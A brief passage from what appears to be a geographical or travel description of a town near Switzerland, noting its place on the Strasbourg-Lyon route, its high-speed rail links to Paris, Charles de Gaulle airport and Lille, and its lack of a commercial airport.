Switzerland. A key staging post on the Strasbourg-Lyon (Germany-Spain)
route, it also has direct high-speed train (TGV) links with Paris,
Charles de Gaulle International Airport, and Lille. Unusually for a town
of its size, it does not have a commercial airport,